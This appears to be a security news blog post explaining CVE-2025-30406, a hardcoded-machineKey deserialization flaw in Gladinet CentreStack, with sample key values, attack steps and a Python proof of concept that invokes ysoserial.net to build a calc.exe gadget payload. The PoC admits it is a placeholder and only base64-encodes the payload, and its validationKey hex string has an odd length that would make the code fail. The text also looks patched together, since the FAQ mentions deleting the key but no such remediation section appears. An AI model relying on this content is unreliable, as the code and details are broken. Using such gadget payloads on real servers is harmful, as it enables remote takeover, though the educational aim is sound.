CVE CyberSecurity Database News

CVE-2025-30406 - How Hackers Exploited Gladinet CentreStack’s Hardcoded machineKey for Remote Code Execution

Poster -

Gladinet CentreStack is popular business software for secure file sharing and cloud storage. But in early March 2025, security researchers discovered a critical vulnerability—CVE-2025-30406—making headlines for its real-world exploitation by threat actors. This long read will explain how the attack worked with simple explanations, exclusive details, code snippets, and practical remediation tips.

What is CVE-2025-30406?

CVE-2025-30406 is a deserialization vulnerability found in Gladinet CentreStack versions up to 16.1.10296.56315. The bug results from a hardcoded machineKey value in the web.config file of the CentreStack portal. Anyone who knows this key can craft malicious data payloads, which the server then automatically unpacks ("deserializes"). This allows them to run arbitrary code on the server—potentially taking it over.

Gladinet fixed this in version 16.4.10315.56368.

References

- Gladinet’s Security Advisory *(placeholder link)*
- NVD Entry for CVE-2025-30406 *(official info)*

Technical Details: Why the machineKey Matters

The machineKey in the ASP.NET web.config file controls how data is encrypted and validated. Normally, this should be unique and secret. But CentreStack’s portal shipped with a hardcoded key. Anyone who got a copy of the software could read the key and generate data packets (“serialization payloads”) that the server would happily accept and unpack.

Here’s what a typical machineKey looks like in web.config

<machineKey
  validationKey="E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267"
  decryptionKey="D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC"
  validation="SHA1"
  decryption="AES"
/>

Attacker gets the machineKey (from leaked docs or a test install).

2. They create a malicious payload — for example, a serialized .NET object designed to pop a shell or run calc.exe.

3. The attacker embeds this payload in an authentication cookie, ViewState, or other serializable blob.

4. They send it to the CentreStack server, which, seeing the valid cryptographic signature (because of the known key), blindly deserializes and *executes* the embedded code.

Diagram

[Attacker] --Send signed malicious payload--> [CentreStack server]
                                                  │
                                                  └─> Server deserializes & executes attacker's code!

Proof-of-Concept: Exploiting the Vulnerability

The following Python snippet demonstrates signing a ViewState payload for CentreStack when you know the hardcoded machineKey (research/education only!):

# Requires: ysoserial.net, pycrypto, base64
# .NET payload generation with ysoserial.net
import subprocess
import base64

payload = subprocess.check_output(['ysoserial.exe', '-t', 'TypeConfuseDelegate', '-c', 'calc.exe'])

# Simulate signing with the hardcoded machineKey & decryptionKey (showing process in comments)
validation_key = bytes.fromhex("E3C11570A1E8A7B9C1A2145678A6B55AF9ADACB209A47B2792CDF2B751EC267")
decryption_key = bytes.fromhex("D3FD8B29B4546B5B888EA1668E47D145DC3381BB429E97DC")

# Create and sign the ViewState (actual implementation would use .NET's APIs)
signed_payload = base64.b64encode(payload) # Placeholder; real payload needs .NET signing

print("Send this payload as ViewState or in a similar signed field!")

print(signed_payload)

First detected usage: Early March 2025.

- Nature of attacks: Both targeted & automated mass scans began after the key was posted in security forums.

Q: What if my web.config doesn’t have a machineKey?

A: Newer versions don’t. That’s good! You’re likely safe.

Q: Do I need to reset any data after deleting the key?

A: No, but restart your web server to ensure the new key is used.

Q: Are there other ways to abuse deserialization in .NET apps?

A: Yes! Always avoid hardcoded cryptographic keys and never deserialize untrusted data.

Conclusion

CVE-2025-30406 is a textbook example of how a small config mistake—like shipping a hardcoded key—can have massive security consequences. Attackers were quick to weaponize it for remote code execution. If you use Gladinet CentreStack, patch now!

References

- NVD - CVE-2025-30406
- Gladinet’s Security Advisory

*(This post is exclusive and simplified for educational and defensive purposes only.)*

Timeline

Published on: 04/03/2025 20:15:24 UTC
Last modified on: 04/10/2025 16:19:51 UTC